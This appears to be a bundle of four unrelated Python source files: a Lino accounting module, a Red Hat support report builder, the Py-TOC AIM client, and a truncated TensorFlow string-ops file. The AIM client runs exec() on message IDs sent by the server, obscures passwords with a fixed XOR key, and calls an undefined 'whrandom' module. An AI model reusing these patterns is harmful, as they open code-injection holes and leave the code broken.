# bank_account = dd.ForeignKey('sepa.Account', blank=True, null=True)
to_pay = DcAmountField(DC.debit, _("To pay")) # 20201219 PaymentOrderItem
# def partner_changed(self, ar):
# FinancialVoucherItem.partner_changed(self, ar)
# BankAccount.partner_changed(self, ar)
# def full_clean(self, *args, **kwargs):
# super(PaymentOrderItem, self).full_clean(*args, **kwargs)
# dd.update_field(PaymentOrderItem, 'iban', blank=True)
# dd.update_field(PaymentOrderItem, 'bic', blank=True)
class JournalEntryDetail(dd.DetailLayout):
main = "general more"
general = dd.Panel("""
entry_date number:6 workflow_buttons
narration
finan.ItemsByJournalEntry
""", label=_("General"))
more = dd.Panel("""
journal accounting_period user id
item_account item_remark
ledger.MovementsByVoucher
""", label=_("More"))
class PaymentOrderDetail(JournalEntryDetail):
general = dd.Panel("""
entry_date number:6 total execution_date workflow_buttons
narration
finan.ItemsByPaymentOrder
""", label=_("General"))
class BankStatementDetail(JournalEntryDetail):
general = dd.Panel("""
general_left uploads.UploadsByController
finan.ItemsByBankStatement
""", label=_("General"))
general_left = """
entry_date number:6 balance1 balance2
narration workflow_buttons
"""
class FinancialVouchers(dd.Table):
model = 'finan.JournalEntry'
required_roles = dd.login_required(LedgerUser)
params_panel_hidden = True
order_by = ["id", "entry_date"]
parameters = dict(
pyear=dd.ForeignKey('ledger.FiscalYear', blank=True),
#~ ppartner=dd.ForeignKey('contacts.Partner',blank=True,null=True),
pjournal=ledger.JournalRef(blank=True))
params_layout = "pjournal pyear"
detail_layout = JournalEntryDetail()
insert_layout = dd.InsertLayout("""
entry_date
narration
""", window_size=(40, 'auto'))
suggest = ShowSuggestions()
suggestions_table = None # 'finan.SuggestionsByJournalEntry'
@classmethod
def get_request_queryset(cls, ar, **kwargs):
qs = super(FinancialVouchers, cls).get_request_queryset(ar, **kwargs)
if not isinstance(qs, list):
if ar.param_values.pyear:
qs = qs.filter(accounting_period__year=ar.param_values.pyear)
if ar.param_values.pjournal:
qs = qs.filter(journal=ar.param_values.pjournal)
return qs
class JournalEntries(FinancialVouchers):
suggestions_table = 'finan.SuggestionsByJournalEntry'
column_names = "number_with_year entry_date narration "\
"accounting_period workflow_buttons *"
class PaymentOrders(FinancialVouchers):
model = 'finan.PaymentOrder'
column_names = "number_with_year entry_date narration total "\
"execution_date accounting_period workflow_buttons *"
detail_layout = PaymentOrderDetail()
suggestions_table = 'finan.SuggestionsByPaymentOrder'
class BankStatements(FinancialVouchers):
model = 'finan.BankStatement'
column_names = "number_with_year entry_date balance1 balance2 " \
"accounting_period workflow_buttons *"
detail_layout = 'finan.BankStatementDetail'
insert_layout = """
entry_date
balance1
"""
suggestions_table = 'finan.SuggestionsByBankStatement'
class AllBankStatements(BankStatements):
required_roles = dd.login_required(LedgerStaff)
class AllJournalEntries(JournalEntries):
required_roles = dd.login_required(LedgerStaff)
class AllPaymentOrders(PaymentOrders):
required_roles = dd.login_required(LedgerStaff)
class PaymentOrdersByJournal(ledger.ByJournal, PaymentOrders):
pass
class JournalEntriesByJournal(ledger.ByJournal, JournalEntries):
pass
class BankStatementsByJournal(ledger.ByJournal, BankStatements):
pass
from lino_xl.lib.ledger.mixins import ItemsByVoucher
# class ItemsByVoucher(ItemsByVoucher):
# suggest = ShowSuggestions()
# suggestions_table = None # 'finan.SuggestionsByJournalEntry'
# display_mode = 'html'
# preview_limit = 0
# label = _("Content")
class ItemsByJournalEntry(ItemsByVoucher):
model = 'finan.JournalEntryItem'
column_names = "seqno date partner match account:50 debit credit remark *"
sum_text_column = 2
class ItemsByBankStatement(ItemsByVoucher):
model = 'finan.BankStatementItem'
column_names = "seqno date partner account match remark expense income "\
"workflow_buttons *"
sum_text_column = 2
suggestions_table = 'finan.SuggestionsByBankStatementItem'
suggest = ShowSuggestions()
class ItemsByPaymentOrder(ItemsByVoucher):
model = 'finan.PaymentOrderItem'
column_names = "seqno partner workflow_buttons bank_account match "\
"to_pay remark *"
suggestions_table = 'finan.SuggestionsByPaymentOrderItem'
suggest = ShowSuggestions()
sum_text_column = 1
class FillSuggestionsToVoucher(dd.Action):
label = _("Fill")
icon_name = 'lightning'
http_method = 'POST'
select_rows = False
def run_from_ui(self, ar, **kw):
voucher = ar.master_instance
seqno = None
n = 0
for obj in ar.selected_rows:
i = voucher.add_item_from_due(obj, seqno=seqno)
if i is not None:
# dd.logger.info("20151117 gonna full_clean %s", obj2str(i))
i.full_clean()
# dd.logger.info("20151117 gonna save %s", obj2str(i))
i.save()
# dd.logger.info("20151117 ok")
seqno = i.seqno + 1
n += 1
msg = _("%d items have been added to %s.") % (n, voucher)
# logger.info(msg)
kw.update(close_window=True)
ar.success(msg, **kw)
class FillSuggestionsToVoucherItem(FillSuggestionsToVoucher):
def run_from_ui(self, ar, **kw):
i = ar.master_instance
obj = ar.selected_rows[0]
# i is the voucher item from which the suggestion table had
# been called. obj is the first selected DueMovement object
# dd.logger.info("20210106 %s", i)
i.fill_suggestion(obj)
# for k, v in voucher.due2itemdict(obj).items():
# setattr(i, k, v)
i.full_clean()
i.save()
voucher = i.voucher
seqno = i.seqno
n = 0
for obj in ar.selected_rows[1:]:
i = voucher.add_item_from_due(obj, seqno=seqno)
if i is not None:
# dd.logger.info("20151117 gonna full_clean %s", obj2str(i))
i.on_create(ar)
i.full_clean()
# dd.logger.info("20151117 gonna save %s", obj2str(i))
i.save()
# dd.logger.info("20151117 ok")
seqno = i.seqno + 1
n += 1
msg = _("%d items have been added to %s.") % (n, voucher)
# logger.info(msg)
kw.update(close_window=True)
ar.success(msg, **kw)
class SuggestionsByVoucher(ledger.ExpectedMovements):
label = _("Suggestions")
# column_names = 'partner project match account due_date debts payments balance *'
column_names = 'info match due_date debts payments balance *'
window_size = ('90%', 20) # (width, height)
editable = False
auto_fit_column_widths = True
cell_edit = False
do_fill = FillSuggestionsToVoucher()
@classmethod
def get_dc(cls, ar=None):
if ar is None:
raise Exception("20200119 ar is None")
return None
voucher = ar.master_instance
if voucher is None:
raise Exception("20200119 voucher is None")
return None
# return voucher.journal.dc.opposite() # 20201219 SuggestionsByVoucher.get_dc()
return voucher.journal.dc # 20201219 SuggestionsByVoucher.get_dc()
@classmethod
def param_defaults(cls, ar, **kw):
kw = super(SuggestionsByVoucher, cls).param_defaults(ar, **kw)
voucher = ar.master_instance
kw.update(for_journal=voucher.journal)
if not dd.plugins.finan.suggest_future_vouchers:
kw.update(date_until=voucher.entry_date)
# kw.update(trade_type=vat.TradeTypes.purchases)
return kw
@classmethod
def get_data_rows(cls, ar, **flt):
#~ partner = ar.master_instance
#~ if partner is None: return []
flt.update(cleared=False)
# flt.update(account__clearable=True)
return super(SuggestionsByVoucher, cls).get_data_rows(ar, **flt)
class SuggestionsByJournalEntry(SuggestionsByVoucher):
master = 'finan.JournalEntry'
class SuggestionsByPaymentOrder(SuggestionsByVoucher):
master = 'finan.PaymentOrder'
# column_names = 'partner match account due_date debts payments balance bank_account *'
column_names = 'info match due_date debts payments balance *'
quick_search_fields = 'info'
@classmethod
def param_defaults(cls, ar, **kw):
kw = super(SuggestionsByPaymentOrder, cls).param_defaults(ar, **kw)
voucher = ar.master_instance
if voucher.journal.sepa_account:
kw.update(show_sepa=dd.YesNo.yes)
kw.update(same_dc=dd.YesNo.yes) # 20201219 SuggestionsByPaymentOrder.param_defaults same_dc
# kw.update(journal=voucher.journal)
kw.update(date_until=voucher.execution_date or voucher.entry_date)
# if voucher.journal.trade_type is not None:
# kw.update(trade_type=voucher.journal.trade_type)
# kw.update(trade_type=vat.TradeTypes.purchases)
return kw
class SuggestionsByBankStatement(SuggestionsByVoucher):
master = 'finan.BankStatement'
class SuggestionsByVoucherItem(SuggestionsByVoucher):
do_fill = FillSuggestionsToVoucherItem()
@classmethod
def get_dc(cls, ar=None):
if ar is None:
return None
item = ar.master_instance
if item is None:
return None
# return item.voucher.journal.dc.opposite() # 20201219 SuggestionsByVoucherItem.get_dc()
return item.voucher.journal.dc # 20201219 SuggestionsByVoucherItem.get_dc()
@classmethod
def param_defaults(cls, ar, **kw):
# Note that we skip immeditate parent
kw = super(SuggestionsByVoucher, cls).param_defaults(ar, **kw)
item = ar.master_instance
voucher = item.voucher
kw.update(for_journal=voucher.journal)
if not dd.plugins.finan.suggest_future_vouchers:
kw.update(date_until=voucher.entry_date)
kw.update(partner=item.partner)
return kw
class SuggestionsByBankStatementItem(SuggestionsByVoucherItem):
master = 'finan.BankStatementItem'
class SuggestionsByPaymentOrderItem(SuggestionsByVoucherItem):
master = 'finan.PaymentOrderItem'
# Declare the voucher types:
VoucherTypes.add_item_lazy(JournalEntriesByJournal)
VoucherTypes.add_item_lazy(PaymentOrdersByJournal)
VoucherTypes.add_item_lazy(BankStatementsByJournal)
# VoucherTypes.add_item_lazy(GroupersByJournal)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from redhat_support_lib.xml import report as report
import StringIO
import datetime
import dateutil.tz as tz
import logging
import os
import platform
import re as re
import shutil
import subprocess
import sys
import tarfile
import tempfile
logger = logging.getLogger("redhat_support_lib.utils.reporthelper")
__author__ = 'Tim Walsh tdwalsh@redhat.com'
__author__ = 'Keith Robertson kroberts@redhat.com'
# specify the max size of a file that can
# be included by value in the xml file
# before it is included as a href
MAX_FILE_SIZE_BYTES = 300000
def rpm_for_file(fileName):
"""
Find the rpm name that provides a specific file.
fileName -- Find the rpm package that supplies this file.
Equivalent to
rpm -qf /etc/passwd
setup-2.8.48-1.fc17
"""
rpmName = None
try:
import rpm
ts = rpm.TransactionSet()
# loop headers to build package name
fileName = os.path.abspath(fileName)
origFileName = fileName
while not rpmName:
headers = ts.dbMatch('basenames', fileName)
for h in headers:
rpmName = "%s-%s-%s" % (h['name'], h['version'], h['release'])
break
fileName = os.path.dirname(fileName)
if (len(fileName) <= 1):
# just in case short circuit
break
if not ts.dbMatch('basenames', origFileName):
return None
except ImportError:
pass
return rpmName
def get_file_type(fileName):
try:
proc = subprocess.Popen(['file', '-bi', '--', fileName],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
if proc.returncode == 0:
return str(stdout).rstrip()
else:
logger.debug(stderr)
raise Exception
except Exception, e:
logger.debug('Problem determing file type of %s. Exception: %s' % \
(fileName, e))
return 'application/octet-stream; charset=binary'
def contains_invalid_xml_chars(fileName):
# BZ967510 - check for certain control chars which are invalid XML
illegal_xml_chars = \
re.compile(u'[\x00-\x08\x0b\x0c\x0e-\x1F\uD800-\uDFFF\uFFFE\uFFFF]')
f = open(fileName, 'rb')
count = os.path.getsize(fileName)
try:
while count > 0:
content = f.read(4096)
if content is None:
raise Exception("Problem encountered reading %s" % (fileName))
count = count - len(content)
if re.search(illegal_xml_chars, content):
return True
finally:
f.close()
return False
def _process_file(fileName,
report_obj,
tar_refs=None,
max_file_size=MAX_FILE_SIZE_BYTES,
name=None):
"""
Process a specific fileName as either a value in xml fileName
or entry in tar fileName
"""
if not name:
name = os.path.basename(fileName)
mtype = get_file_type(fileName)
if os.path.getsize(fileName) > max_file_size or \
str(mtype).rfind('charset=binary') >= 0 or \
contains_invalid_xml_chars(fileName):
tar_refs.append(fileName)
report_obj.add_binding(report.binding(name=name,
fileName=fileName,
type_=mtype,
href='content/%s' % \
(os.path.basename(fileName))))
else:
# read content from fileName and place into xml
f = open(fileName, 'rb')
try:
content = f.read()
finally:
f.close
# BZ967510 - handle &#.*; chars and nested CDATA sections
if re.search('[&;<>]', content):
content = content.replace(']]>',']]]]><![CDATA[>')
content = u'<![CDATA[%s]]>' % (content.decode('utf-8'))
try:
report_obj.add_binding(report.binding(name=name,
fileName=fileName,
type_=mtype,
valueOf_=content))
except Exception, e:
print e
def _add_sys_info(report_obj,
fileName):
"""
Add the system specific info to the report object. Handles the case where
these objects are already included via ABRT, in which case the ABRT information
will not be overwritten.
report_obj -- The redhat_support_lib.xml.report to which binding should be added.
fileName -- The original file or directory supplied by the user. This will be
queried to determine package information.
Information added:
- Kernel version
- Package info
- Hostname
- OS Arch
- OS Release
"""
info = {'kernel': True,
'package': True,
'hostname': True,
'architecture': True,
'os_release': True}
# Step 1: See what is already there.
bAry = report_obj.get_binding()
for b in bAry:
if b.get_name() in info:
info[b.get_name()] = False
if info['kernel']:
report_obj.add_binding(report.binding(name='kernel',
valueOf_=platform.release()))
if info['package']:
report_obj.add_binding(report.binding(name='package',
valueOf_=rpm_for_file(fileName)))
if info['hostname']:
report_obj.add_binding(report.binding(name='hostname',
valueOf_=platform.node()))
if info['architecture']:
report_obj.add_binding(report.binding(name='architecture',
valueOf_=platform.processor()))
if info['os_release']:
report_obj.add_binding(report.binding(name='os_release',
valueOf_=str(' ').join(platform.dist())))
def _add_custom(report_obj,
custom):
'''
Add any custom bindings to the content.xml
report_obj -- The redhat_support_lib.xml.report to which binding should be added.
custom -- A dictionary of bindings. Key will be name and value will
binding's value.
e.g.
<binding name='uid'>500</binding>
'''
for i in custom:
report_obj.add_binding(report.binding(name=i,
valueOf_=custom[i]))
def _write_report_file(report_obj,
temp_dir,
tar_refs=None):
'''
report_obj -- The redhat_support_lib.xml.report to which binding should be added.
temp_dir -- A valid directory into which a report file will be placed.
tar_refs -- An array of files to be added to the tar.bz2
'''
out = None
content_xml = None
out_file = None
try:
try:
# Marshal everything into a tar or XML file.
content_xml = StringIO.StringIO()
content_xml.write('<?xml version="1.0" ?>' + os.linesep)
report_obj.export(content_xml,
0,
namespace_='',
namespacedef_='xmlns="http://www.redhat.com/gss/strata"')
if len(tar_refs) > 0:
out_file = os.path.join(temp_dir,
'report-%s.tar.bz2' % \
(datetime.datetime.now(
tz=tz.tzutc()).strftime("%Y%m%d%H%M%S")))
out = tarfile.open(out_file, 'w:bz2')
# Add the descriptor
info = tarfile.TarInfo(name='content.xml')
content_xml.seek(0)
info.size = len(content_xml.buf)
info.mtime = os.stat(out_file).st_mtime
out.addfile(tarinfo=info, fileobj=content_xml)
# Add the files.
for i in tar_refs:
logger.debug('adding %s as %s to %s' % (i,
'content/%s' % (os.path.basename(i)),
out_file))
out.add(i, arcname='content/%s' % (os.path.basename(i)))
else:
out_file = os.path.join(temp_dir,
'report-%s.xml' % \
(datetime.datetime.now(\
tz=tz.tzutc()).strftime("%Y%m%d%H%M%S")))
out = open(out_file, 'wb')
out.write(content_xml.getvalue())
except Exception, e:
logger.exception(e)
try:
logger.debug(
"Cleaning up temp directory %s from failed create." % \
(temp_dir))
shutil.rmtree(temp_dir)
except Exception, e:
# Nothing to see here move along please
pass
raise Exception('Unable to create report file in %s.' % (temp_dir))
finally:
if out:
out.close()
if content_xml:
content_xml.close()
return out_file
def make_report(path=None,
custom=None,
max_file_size=MAX_FILE_SIZE_BYTES,
report_dir=None):
"""
Make a report.
A Report is made from a path. The name and content params allow for customer name/value entry
into xml. Typical use is to only use the path name.
path -- the file or folder from which a report should be made
custom -- A dictionary of bindings. Key will be name and value will
binding's value.
max_file_size -- The max size (in bytes) of a file which should be included in content.xml.
report_dir -- By default, the generated report file will be placed in a temporary directory
created by mkdtemp. This usually resolves to /tmp; however, if there isn't
enough space there you can specify an alternate base dir for temp files.
Usage:
Generate report xml with simple name/value binding:
make_report("kernel", "2.6.32-71.el6.x86_64")
Generate report xml with a path to process ( /var/spool/abrt/ccpp-2012-07-10-21:30:32-1920 )
make_report(path="/var/spool/abrt/ccpp-2012-07-10-21:30:32-1920")
return The path to an XML file or a TGZ depending on the size of 'path'
"""
tar_refs = []
temp_dir = None
rpt = report.report()
# check path to be included in report
try:
# Try to make the temporary directory first.
temp_dir = tempfile.mkdtemp(dir=report_dir)
if os.path.isfile(path):
_process_file(fileName=path,
report_obj=rpt,
tar_refs=tar_refs,
max_file_size=MAX_FILE_SIZE_BYTES,
name='description')
elif os.path.isdir(path):
p = os.walk(path)
for root_name, dir_name, file_names in p:
# process files
for fn in file_names:
_process_file(os.path.join(root_name, fn),
rpt,
tar_refs)
else:
# Fail fast. It is either a file, dir, or none
raise ValueError('Please supply a valid file or directory to process.')
except Exception, e:
logger.debug(e)
raise Exception('Unable to generate report file.')
_add_sys_info(rpt, path)
if custom:
_add_custom(rpt, custom)
return _write_report_file(rpt,
temp_dir,
tar_refs)
if __name__ == '__main__':
# /var/spool/abrt/ccpp-2012-08-16-11:35:40-5397
if len(sys.argv) == 2:
file_name = make_report(path=sys.argv[1])
print('File is %s' % (file_name))
else:
print "Usage: %s /path/to/file-or-dir" % (sys.argv[0])
|
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
############################################
# Py-TOC 1.2
#
# Jamie Turner <jamwt@jamwt.com>
#
DEBUG = 1
import sys
import socket
import re
import struct
from pycopia import sysrandom
TOC_SERV_AUTH = ("login.oscar.aol.com", 5159 )
TOC_SERV = ( "toc.oscar.aol.com", 9898 )
class TOCError(Exception):
pass
class TocTalk(object):
def __init__(self,nick,passwd):
self._nick = nick
self._passwd = passwd
self._agent = "PY-TOC"
self._info = "I'm running the Python TOC Module by James Turner <jamwt@jamwt.com>"
self._seq = whrandom.randint(0,65535)
self.build_funcs()
def build_funcs(self):
self._dir = []
for item in dir(self.__class__):
if ( type( eval("self.%s" % item)) == type(self.__init__) and
item[:3] == "on_" ):
self._dir.append(item)
def go(self):
self.connect()
self.process_loop()
def start(self):
pass
def connect(self):
#create the socket object
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except:
raise TOCError, "FATAL: Couldn't create a socket"
# make the connection
try:
self._socket.connect( TOC_SERV )
except:
raise TOCError, "FATAL: Could not connect to TOC Server"
buf = "FLAPON\r\n\r\n"
bsent = self._socket.send(buf)
if bsent <> len(buf):
raise TOCError, "FATAL: Couldn't send FLAPON!"
def start_log_in(self):
ep = self.pwdenc()
self._normnick = self.normalize(self._nick)
msg = struct.pack("!HHHH",0,1,1,len(self._normnick)) + self._normnick
self.flap_to_toc(1,msg)
#now, login
self.flap_to_toc(2,"toc_signon %s %s %s %s english %s" % (
TOC_SERV_AUTH[0],TOC_SERV_AUTH[1],self._normnick,ep,self.encode(self._agent) ) )
def normalize(self,data):
data = re.sub("[^A-Za-z0-9]","",data)
return data.lower()
def encode(self,data):
for letter in "\\(){}[]$\"":
data = data.replace(letter,"\\%s"%letter)
return '"' + data + '"'
def flap_to_toc(self,ftype,msg):
if ftype == 2:
msg = msg + struct.pack("!B", 0)
ditems = []
ditems.append("*")
ditems.append(struct.pack("!BHH",ftype,self._seq,len(msg)))
ditems.append(msg)
data = "".join(ditems)
derror( "SEND : \'%r\'" % data )
bsent = self._socket.send(data)
if bsent <> len(data):
#maybe make less severe later
raise TOCError, "FATAL: Couldn't send all data to TOC Server\n"
self._seq = self._seq + 1
def pwdenc(self):
lookup = "Tic/Toc"
ept = []
x = 0
for letter in self._passwd:
ept.append("%02x" % ( ord(letter) ^ ord( lookup[x % 7]) ) )
x = x + 1
return "0x" + "".join(ept)
def process_loop(self):
# the "main" loop
while 1:
event = self.recv_event()
if not event:
continue
derror( "RECV : %r" % event[1] )
#else, fig out what to do with it
#special case-- login
if event[0] == 1:
self.start_log_in()
continue
if not event[1].count(":"):
data = ""
else:
ind = event[1].find(":")
id = event[1][:ind].upper()
data = event[1][ind+1:]
#handle manually now
if id == "SIGN_ON":
self.c_SIGN_ON(id,data)
continue
if id == "ERROR":
self.c_ERROR(id,data)
continue
#their imp
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
werror("INFO : Received unimplemented '%s' id" % id)
def recv_event(self):
header = self._socket.recv(6)
if header == "":
self.err_disconnect()
return
(marker,mtype,seq,buflen) = struct.unpack("!sBhh",header)
#get the info
dtemp = self._socket.recv(buflen)
data = dtemp
while len(data) != buflen:
if dtemp == "":
self.err_disconnect()
return
dtemp = self._socket.recv(buflen - len(data))
data = data + dtemp
return (mtype, data)
def err_disconnect(self):
sys.stdout.write("ERROR: We seem to have been disconnected from the TOC server.\n")
sys.exit(0)
# our event handling
def c_ERROR(self,id,data):
# let's just grab the errors we care about!
#still more fields
if data.count(":"):
data = int (data[:data.find(":")])
else:
data = int(data) # let's get an int outta it
if data == 980:
raise TOCError, "FATAL: Couldn't sign on; Incorrect nickname/password combination"
if data == 981:
raise TOCError, "FATAL: Couldn't sign on; The AIM service is temporarily unavailable"
elif data == 982:
raise TOCError, "FATAL: Couldn't sign on; Your warning level is too high"
elif data == 983:
raise TOCError, "FATAL: Couldn't sign on; You have been connecting and disconnecting too frequently"
elif data == 989:
raise TOCError, "FATAL: Couldn't sign on; An unknown error occurred"
# ... etc etc etc
else:
# try to let further implementation handle it
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
werror("ERROR: The TOC server sent an unhandled error code: #%d" % data)
def c_SIGN_ON(self,type,data):
self.flap_to_toc(2,"toc_add_buddy jamwt") # needs to start up corectly
self.flap_to_toc(2,"toc_set_info %s" % self.encode(self._info) )
self.flap_to_toc(2,"toc_init_done")
self.start()
def strip_html(self,data):
return re.sub("<[^>]*>","",data)
def normbuds(self,buddies):
nbuds = []
for buddy in buddies:
nbuds.append(self.normalize(buddy))
return " ".join(nbuds)
#actions--help the user w/common tasks
#the all-important
def do_SEND_IM(self,user,message):
self.flap_to_toc(2,"toc_send_im %s %s" % ( self.normalize(user), self.encode(message) ) )
def do_ADD_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_add_buddy %s" % " ".join(self.normbuds(buddies) ) )
def do_ADD_PERMIT(self,buddies):
self.flap_to_toc(2,"toc_add_permit %s" % " ".join(self.normbuds(buddies) ) )
def do_ADD_DENY(self,buddies):
self.flap_to_toc(2,"toc_add_deny %s" % " ".join(self.normbuds(buddies) ) )
def do_REMOVE_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_remove_buddy %s" % " ".join(self.normbuds(buddies) ) )
# away, idle, user info handling
def do_SET_IDLE(self,itime):
self.flap_to_toc(2,"toc_set_idle %d" % itime )
def do_SET_AWAY(self,awaymess):
if awaymess == "":
self.flap_to_toc(2,"toc_set_away")
return
self.flap_to_toc(2,"toc_set_away %s" % self.encode(awaymess) )
def do_GET_INFO(self,user):
self.flap_to_toc(2,"toc_get_info %s" % self.normalize(user) )
def do_SET_INFO(self,info):
self.flap_to_toc(2,"toc_set_info %s" % self.encode(info) )
# warning capability
def do_EVIL(self,user,anon=0):
if anon:
acode = "anon"
else:
acode = "norm"
self.flap_to_toc(2,"toc_evil %s %s" % (self.normalize(user), acode) )
#chat
def do_CHAT_INVITE(self,room,imess,buddies):
self.flap_to_toc(2,"toc_chat_invite %s %s %s" % (self.normalize(room),
self.encode(imess), self.normbuds(buddies) ) )
def do_CHAT_ACCEPT(self, id):
self.flap_to_toc(2,"toc_chat_accept %s" % id)
def do_CHAT_LEAVE(self,id):
self.flap_to_toc(2,"toc_chat_leave %s" % id)
def do_CHAT_WHISPER(self,room,user,message):
self.flap_to_toc(2,"toc_chat_whisper %s %s %s" % (room,
self.normalize(user), self.encode(message) ) )
def do_CHAT_SEND(self,room,message):
self.flap_to_toc(2,"toc_chat_send %s %s" % (room,
self.encode(message) ) )
def do_CHAT_JOIN(self,roomname):
self.flap_to_toc(2,"toc_chat_join 4 %s" % roomname)
def do_SET_CONFIG(self,configstr):
self.flap_to_toc(2,"toc_set_config \"%s\"" % configstr)
#todo more later!
def werror(errorstr):
if DEBUG:
sys.stdout.write("%s\n"%errorstr)
def derror(errorstr):
if DEBUG > 1:
sys.stdout.write("%s\n"%errorstr)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for working with string Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.compat import compat
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_parsing_ops
from tensorflow.python.ops import gen_string_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
# pylint: disable=g-bad-import-order
from tensorflow.python.ops.gen_string_ops import *
from tensorflow.python.util import compat as util_compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import dispatch
from tensorflow.python.util.tf_export import tf_export
# pylint: enable=g-bad-import-order
# pylint: enable=wildcard-import
# pylint: disable=redefined-builtin
@tf_export("strings.regex_full_match")
@dispatch.add_dispatch_support
def regex_full_match(input, pattern, name=None):
r"""Match elements of `input` with regex `pattern`.
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
name: Name of the op.
Returns:
bool `Tensor` of the same shape as `input` with match results.
"""
# TODO(b/112455102): Remove compat.forward_compatible once past the horizon.
if not compat.forward_compatible(2018, 11, 10):
return gen_string_ops.regex_full_match(
input=input, pattern=pattern, name=name)
if isinstance(pattern, util_compat.bytes_or_text_types):
# When `pattern` is static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_full_match(
input=input, pattern=pattern, name=name)
return gen_string_ops.regex_full_match(
input=input, pattern=pattern, name=name)
regex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__
@tf_export(
"strings.regex_replace", v1=["strings.regex_replace", "regex_replace"])
@deprecation.deprecated_endpoints("regex_replace")
@dispatch.add_dispatch_support
def regex_replace(input, pattern, rewrite, replace_global=True, name=None):
r"""Replace elements of `input` matching regex `pattern` with `rewrite`.
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
rewrite: string or scalar string `Tensor`, value to use in match
replacement, supports backslash-escaped digits (\1 to \9) can be to insert
text matching corresponding parenthesized group.
replace_global: `bool`, if `True` replace all non-overlapping matches,
else replace only the first match.
name: A name for the operation (optional).
Returns:
string `Tensor` of the same shape as `input` with specified replacements.
"""
if (isinstance(pattern, util_compat.bytes_or_text_types) and
isinstance(rewrite, util_compat.bytes_or_text_types)):
# When `pattern` and `rewrite` are static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
return gen_string_ops.regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
@tf_export("strings.format")
def string_format(template, inputs, placeholder="{}", summarize=3, name=None):
r"""Formats a string template using a list of tensors.
Formats a string template using a list of tensors, abbreviating tensors by
only printing the first and last `summarize` elements of each dimension
(recursively). If formatting only one tensor into a template, the tensor does
not have to be wrapped in a list.
Example:
Formatting a single-tensor template:
```python
sess = tf.Session()
with sess.as_default():
tensor = tf.range(10)
formatted = tf.strings.format("tensor: {}, suffix", tensor)
out = sess.run(formatted)
expected = "tensor: [0 1 2 ... 7 8 9], suffix"
assert(out.decode() == expected)
```
Formatting a multi-tensor template:
```python
sess = tf.Session()
with sess.as_default():
tensor_one = tf.reshape(tf.range(100), [10, 10])
tensor_two = tf.range(10)
formatted = tf.strings.format("first: {}, second: {}, suffix",
(tensor_one, tensor_two))
out = sess.run(formatted)
expected = ("first: [[0 1 2 ... 7 8 9]\n"
" [10 11 12 ... 17 18 19]\n"
" [20 21 22 ... 27 28 29]\n"
" ...\n"
" [70 71 72 ... 77 78 79]\n"
" [80 81 82 ... 87 88 89]\n"
" [90 91 92 ... 97 98 99]], second: [0 1 2 ... 7 8 9], suffix")
assert(out.decode() == expected)
```
Args:
template: A string template to format tensor values into.
inputs: A list of `Tensor` objects, or a single Tensor.
The list of tensors to format into the template string. If a solitary
tensor is passed in, the input tensor will automatically be wrapped as a
list.
placeholder: An optional `string`. Defaults to `{}`.
At each placeholder occurring in the template, a subsequent tensor
will be inserted.
summarize: An optional `int`. Defaults to `3`.
When formatting the tensors, show the first and last `summarize`
entries of each tensor dimension (recursively). If set to -1, all
elements of the tensor will be shown.
name: A name for the operation (optional).
Returns:
A scalar `Tensor` of type `string`.
Raises:
ValueError: if the number of placeholders does not match the number of
inputs.
"""
# If there is only one tensor to format, we will automatically wrap it in a
# list to simplify the user experience
if tensor_util.is_tensor(inputs):
inputs = [inputs]
if template.count(placeholder) != len(inputs):
raise ValueError("%s placeholder(s) in template does not match %s tensor(s)"
" provided as input" % (template.count(placeholder),
len(inputs)))
return gen_string_ops.string_format(inputs,
template=template,
placeholder=placeholder,
summarize=summarize,
name=name)
@tf_export("string_split")
def string_split(source, delimiter=" ", skip_empty=True): # pylint: disable=invalid-name
"""Split elements of `source` based on `delimiter` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `delimiter` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
If `delimiter` is an empty string, each element of the `source` is split
into individual strings, each containing one byte. (This includes splitting
multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is
